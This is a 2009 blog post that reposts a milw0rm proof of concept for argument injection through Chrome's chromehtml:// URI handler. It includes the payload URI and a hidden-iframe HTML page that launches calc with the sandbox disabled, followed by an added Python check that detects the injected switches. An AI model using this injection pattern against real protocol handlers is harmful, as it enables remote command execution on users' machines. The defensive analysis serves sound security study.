Friday, January 30, 2009

Yet Another Google Chrome Sploit

Milw0rm has released a Google Chrome 1.0.154.46 (ChromeHTML://) parameter injection PoC by waraxe.

****The following is copied and pasted from http://www.milw0rm.com/exploits/7935****

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html>
<head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body>
</html>

# milw0rm.com [2009-01-30]
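The bug above works because the registered handler pastes the whole URI into a quoted command-line argument, so a `"` inside the URI closes that quote and everything after it is parsed as extra switches. The following is an added example (not part of the milw0rm post) that models this from the defender's side: it assumes a handler template of the shape chrome.exe -- "%1" (an assumption for illustration, not the exact registry value), shows which switches would leak through for a given URI, and rejects any URI that breaks out of the argument.

```python
"""Defender-side check for protocol-handler argument injection.

Added example, not from the milw0rm post. HANDLER_TEMPLATE is an assumed
shape: the URI is substituted into a quoted argument, so a '"' in the
URI terminates the quote and later text becomes separate switches.
"""
from urllib.parse import unquote

HANDLER_TEMPLATE = 'chrome.exe -- "%1"'   # assumed for illustration


def build_command_line(uri: str) -> str:
    """Percent-decode the URI (as the browser does) and splice it in."""
    return HANDLER_TEMPLATE.replace("%1", unquote(uri))


def split_args(cmdline: str) -> list[str]:
    """Minimal quote-aware split approximating how argv is formed."""
    args, cur, in_quote = [], "", False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote          # quote toggles, is not kept
        elif ch == " " and not in_quote:
            if cur:
                args.append(cur)
                cur = ""
        else:
            cur += ch
    if cur:
        args.append(cur)
    return args


def injected_switches(uri: str) -> list[str]:
    """Switches that would reach the browser beyond the one intended URI."""
    argv = split_args(build_command_line(uri))
    # argv[0] is the exe, argv[1] is '--', argv[2] is the intended URI;
    # anything after that only exists because the URI broke out of its quotes.
    return [a for a in argv[3:] if a.startswith("--")]


def is_safe_handler_uri(uri: str) -> bool:
    """Reject a URI that contains a quote or would inject any switch."""
    return '"' not in unquote(uri) and not injected_switches(uri)


if __name__ == "__main__":
    poc = 'chromehtml:"%20--renderer-path="calc"%20--no-sandbox'   # from the post
    print(injected_switches(poc))            # ['--renderer-path=calc', '--no-sandbox']
    print(is_safe_handler_uri("chromehtml:http://example.com/"))   # True
```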
